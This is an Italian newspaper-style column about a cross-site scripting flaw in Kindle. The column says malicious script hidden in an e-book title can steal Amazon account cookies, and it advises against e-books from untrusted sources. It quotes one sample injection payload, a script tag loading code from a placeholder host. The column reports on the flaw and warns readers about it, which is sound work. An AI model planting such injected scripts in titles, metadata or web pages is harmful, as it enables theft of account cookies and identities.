Gli ebook nel mirino degli hacker

Stamani ho raggiunto la stazione ferroviaria in metropolitana. E, per chi conosce le mie abitudini di motociclista climaticamente imperturbabile, questa potrebbe già essere la notizia. Ma non è così. Nonostante la calca, molti gladiatori e amazzoni del pendolariato urbano tenevano stretto tra le mani un lettore di libri elettronici, quello che tutti ormai chiamano con nonchalance “e-book reader“. E tutti loro, incuranti dell’affollamento e del servizio di trasporto inqualificabile al punto da non poter esser definito servizio, erano intenti a legger qualcosa.

Una meraviglia. Vedere persone che non hanno perso il gusto di leggere mi ha riempito il cuore di gioia, ma non ho fatto in tempo a rallegrarmi che subito i miei pensieri sono corsi all’ultimo incubo di sicurezza informatica. E per sventura, riguardava proprio molti di loro.

Proprio in questi giorni è riapparsa una minaccia che – scoperta nell’ottobre di un anno fa – molti credevano esser stata curata a dicembre e definitivamente archiviata. Il 16 settembre sarebbe stato individuato un nuovo specifico rimedio.

A lanciare l’allarme è un ricercatore particolarmente attivo, Benjamin Daniel Mussler, che non esita a spiegare che gli hacker possono ‘avvelenare’ i lettori Kindle utilizzando codici maligni o ‘script‘, nascosti ad esempio nel titolo di un e-book, andando a compromettere gravemente l’account Amazon del malcapitato di turno.

L’azione criminale va a colpire le funzioni di gestione dei contenuti e dei dispositivi e quelle di impostazione dell’apparato presenti nella libreria di Kindle. Una tanto impercettibile quanto venefica istruzione maligna come « <script src=”https://www.example.org/script.js”></script> » può essere mandata in esecuzione non appena l’utente apre la pagina web del Kindle Store: i cookies dell’account di Amazon possono essere raggiunti e trasferiti a chi ha progettato la trappola con conseguenze sgradevoli per chi si è inconsapevolmente fatto scippare la propria identità di bibliofilo digitale.

Mentre gli e-book “originali” sono considerati sicuri, quelli acquisiti da fonti non certificate (siti “birichini” o amici/colleghi pronti a condividere file di dubbia o ignota provenienza) possono essere sfruttati dai moderni manigoldi per andare a segno.

Mentre gli esperti sono al lavoro per verificare se il “fixing” (ovvero la riparazione della falla) è andato a buon fine, la raccomandazione è quella di non cadere nella tentazione di accaparrarsi libri elettronici di cui non si conosce l’origine o che si sa essere frutto di più o meno acrobatiche scorribande.

Sempre stamani, sempre in metropolitana, ho visto tanta gente che sfogliava libri ‘veri’, libri di carta, accarezzandone le pagine e piegando l’angolo superiore del foglio che erano giunti a leggere arrivando alla propria fermata così da non perdere il segno. Avrei voluto dir loro quanto erano fortunati a non doversi preoccupare di pirati e banditi, ma erano già felici così mentre stringevano il loro volume gelosamente rivestito con carta di fortuna per preservarne la copertina originale. E la loro letizia ha contagiato anche me.

Twitter: @Umberto_Rapetto